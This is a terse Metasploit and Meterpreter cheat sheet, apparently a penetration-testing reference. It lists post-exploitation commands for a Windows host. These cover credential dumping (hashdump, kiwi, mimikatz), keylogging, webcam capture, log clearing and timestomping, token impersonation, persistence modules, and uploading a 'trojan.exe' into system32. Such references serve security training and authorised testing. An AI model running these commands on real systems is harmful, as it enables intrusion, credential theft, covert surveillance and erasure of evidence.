Metasploit Cheat Sheet

  • service postgresql start
  • msfdb init
  • msfconsole
    • db_nmap -sn […] / db_nmap -T4 -A -v […]
    • show
    • use […]
      • info
      • options
      • payloads
      • targets
      • run / exploit / exploit -j -z
      • jobs
      • sessions
      • sessions -i […]
    • search […]
  • searchsploit […]

Metasploit Popular Modules

  • exploit/multi/handle
  • payload/windows/x64/meterpreter_reverse_tcp
  • post/win/gather/hashdump
  • post/windows/manage/migrate
  • exploit/windows/local/persistence
  • exploit/windows/local/registry_persistence

Meterpreter Cheat Sheet

  • help
  • background
  • bgrun
  • bglist
  • bgkill
  • cat
  • del
  • timestomp
  • pwd
  • clearev
  • download c:\\boot.ini
  • upload trojan.exe c:\\windows\\system32
  • edit edit.txt
  • execute -f cmd.exe -i -H
  • resource resource.txt
  • search -f autoexec.bat /¬†search -f sea*.bat c:\\xamp\\
  • getuid
  • idletime
  • ipconfig
  • portfwd
  • route
  • sysinfo
  • hashdump
  • getsystem
  • exploit
  • interact
  • ps
  • source
  • shell
  • lcd
  • lpwd
  • lls
  • migrate
  • keyscan_start
  • keyscan_stop
  • keyscan_dump
  • screenshot
  • webcam_list
  • webcam_snap
  • load incognito
    • list tokens -u
    • list tokens -g
    • impersonate_token \\WORKGROUP\Administrator
  • load kiwi
    • help
    • creds_all
    • rev2self
  • load mimikats
    • help
    • kerberos
  • run persistence -h
  • run netsvc -A
  • run autoroute -s 10.0.0.0/24
  • run autoroute -p